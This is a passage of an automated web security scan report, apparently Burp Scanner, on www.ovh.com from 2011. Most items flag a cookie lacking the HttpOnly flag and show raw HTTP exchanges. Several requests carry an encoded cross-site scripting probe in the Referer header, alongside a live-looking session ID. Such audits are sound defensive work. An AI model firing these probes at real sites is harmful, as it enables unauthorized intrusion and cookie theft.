Expires: Sat, 05 Mar 2011 17:10:46 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR................n....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...{IDATx.b|..3..0I..`.......2....?....A..0......bab`....*...k.......e.P..r!....._.....l8D....@S......`dd....@...
...[SNIP]...

3.102. http://www.ovh.com/fr/themes/default/images/flags/ie.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/flags/ie.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/flags/ie.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 08 Jul 2008 18:47:57 GMT
ETag: "34405-1e1-45187a1649140"
Accept-Ranges: bytes
Content-Length: 481
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:46 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR................n....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...sIDATx.bd........10.ax..... ...??D.T..c....8.......C.k5T.......@...(......1....1..... .X.X@.O.>.../.|......?
...[SNIP]...

3.103. http://www.ovh.com/fr/themes/default/images/flags/it.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/flags/it.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/flags/it.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 08 Jul 2008 18:47:55 GMT
ETag: "3440d-1a4-45187a1460cc0"
Accept-Ranges: bytes
Content-Length: 420
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:45 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR................n....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...6IDATx.bd........10.ax....*.RU.... ..ba..P.ZR....IJJ........bb....... .e.&..ba`..?......@.P...o......QV.h.@...
...[SNIP]...

3.104. http://www.ovh.com/fr/themes/default/images/flags/lt.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/flags/lt.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/flags/lt.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 08 Jul 2008 18:47:53 GMT
ETag: "34423-1fc-45187a1278840"
Accept-Ranges: bytes
Content-Length: 508
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:46 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR................n....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b.}...........D...$.l bb.. ..j&.f.....2........?.....P...@......... ..&..F..g. ....B...........U.h.
...[SNIP]...

3.105. http://www.ovh.com/fr/themes/default/images/flags/nl.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/flags/nl.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/flags/nl.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 08 Jul 2008 18:47:51 GMT
ETag: "34444-1c5-45187a10903c0"
Accept-Ranges: bytes
Content-Length: 453
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:46 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR................n....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...WIDATx.b.....P.X.@.........`..U..5../w9..~.....LO.)...V...*...<.......'..J..........@..~...$......(+.. .X.D.
...[SNIP]...

3.106. http://www.ovh.com/fr/themes/default/images/flags/pl.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/flags/pl.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/flags/pl.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 08 Jul 2008 18:47:56 GMT
ETag: "34452-176-45187a1554f00"
Accept-Ranges: bytes
Content-Length: 374
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:45 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR................n....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...#........?l. .X@
.................3300.G._.=.. ..........##..?....H..).......VF.j0..... .X.......?
...[SNIP]...

3.107. http://www.ovh.com/fr/themes/default/images/flags/pt.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/flags/pt.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/flags/pt.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 08 Jul 2008 18:47:56 GMT
ETag: "34458-22a-45187a1554f00"
Accept-Ranges: bytes
Content-Length: 554
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:45 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR................n....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx.bd.d`.......X..n.2."..ba..P.ZR.....e.........?...a.....?.a..M...... .....O.... .....'............._...
...[SNIP]...

3.108. http://www.ovh.com/fr/themes/default/images/flags/uk.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/flags/uk.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/flags/uk.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 20 Dec 2007 02:25:44 GMT
ETag: "343eb-257-441ae7a9bfa00"
Accept-Ranges: bytes
Content-Length: 599
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:45 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR................n....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b.4s.....C.^.a``........+mS....[._.w..o...~..r:].v.'.E.....>.......?...FUE!5Cn._?.+
y......F[...L.5]..^g.w..^ ...+T....
...[SNIP]...

3.109. http://www.ovh.com/fr/themes/default/images/header/header_sub_menu_sep.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/header/header_sub_menu_sep.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/header/header_sub_menu_sep.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 08 Jul 2008 18:48:25 GMT
ETag: "3478e-97-45187a30fd040"
Accept-Ranges: bytes
Content-Length: 151
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:36 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR.............L.W.....sBIT....|.d.... pHYs.......B(.x....tEXtSoftware.www.inkscape.org..<.....IDAT..c....&........Y.#..:_....IEND.B`.

3.110. http://www.ovh.com/fr/themes/default/images/share/tab_inverted_selected.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/share/tab_inverted_selected.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/share/tab_inverted_selected.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 20 Dec 2007 02:26:22 GMT
ETag: "35064-188-441ae7cdfcf80"
Accept-Ranges: bytes
Content-Length: 392
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:11:03 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR...n.........l..\....sBIT....|.d.... pHYs.......B(.x....tEXtSoftware.www.inkscape.org..<.....IDATh......0......n.X....8..v.....1s..-{..k`.&0U.g...*.4M....m...E..EQP.%UU}.TU..'I.P.5Y
...[SNIP]...

3.111. http://www.ovh.com/fr/themes/default/images/share/tab_unselected.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/share/tab_unselected.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/share/tab_unselected.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 20 Dec 2007 02:26:23 GMT
ETag: "35067-140-441ae7cef11c0"
Accept-Ranges: bytes
Content-Length: 320
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:11:03 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR...n.........l..\....sBIT....|.d.... pHYs.......B(.x....tEXtSoftware.www.inkscape.org..<.....IDATh......@.E.K......... ..L.D9j..Z.c+yG.z........Ik3.w...:r....8........L.D.....;....
...[SNIP]...

3.112. http://www.ovh.com/javascripts/nav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/javascripts/nav.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascripts/nav.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 22 Feb 2011 17:05:43 GMT
ETag: "2f7c2-353-49ce1fd9e9902"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:08 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 851

//javascript document

// Easy function allowing popup options/

function open_page(URL)
{
// check if we have GET param and hod it in url
if (URL.match('=') != null) {

...[SNIP]...

3.113. http://www.ovh.com/javascripts/sessionAjax.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/javascripts/sessionAjax.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascripts/sessionAjax.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 22 Feb 2011 17:05:43 GMT
ETag: "e138-1470-49ce1fd9e3d34"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:06 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 5232

// this package relies on some cgi that will give session info from session cookies contained in web browsers

// this code is used to allow customer to use their session
// from any page on the websi
...[SNIP]...

3.114. http://www.ovh.com/javascripts/share.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/javascripts/share.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascripts/share.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 22 Feb 2011 17:05:43 GMT
ETag: "2f7c6-1cd2-49ce1fd9e9eb1"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:08 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 7378

// JavaScript Document

var secondMenuHover = "none";
var mainMenuHover = "none";

function showSecondMenu() {
   // Show the second menu selected and hide the others

   hideSecondMenu(mainMe
...[SNIP]...

3.115. http://www.ovh.com/js/10/menu.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/js/10/menu.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/10/menu.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 03:05:56 GMT
ETag: "1f44f-2620-4882b9a105f34"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:06 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 9760

/*
UvumiTools Dropdown Menu v1.1.2 http://uvumi.com/tools/dropdown.html

Copyright (c) 2009 Uvumi LLC

Permission is hereby granted, free of charge, to any person
obtaining a copy of this softwa
...[SNIP]...

3.116. http://www.ovh.com/js/Core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/js/Core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/Core.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 22 Jul 2008 10:35:34 GMT
ETag: "6a16-3cd-4529a62456980"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:07 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 973

/*
Script: Core.js
Extends mootools.

Copyright:
Copyright (c) 2008 OVH. All rights reserved.
*/

//
// display tools
//

function displayMessage(msg)
{
new Element("div", {

...[SNIP]...

3.117. http://www.ovh.com/js/Logger.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/js/Logger.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/Logger.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Wed, 17 Sep 2008 15:30:13 GMT
ETag: "6a18-13f4-4571924f9eb40"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:09 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 5108

/*
Script: Logger.js
Logger system.

Examples:
logger.setLevel(4); // enable logger to the most verbose mode

logger.debug('hello world'); // debug

...[SNIP]...

3.118. http://www.ovh.com/js/ajax-lib-core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/js/ajax-lib-core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/ajax-lib-core.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
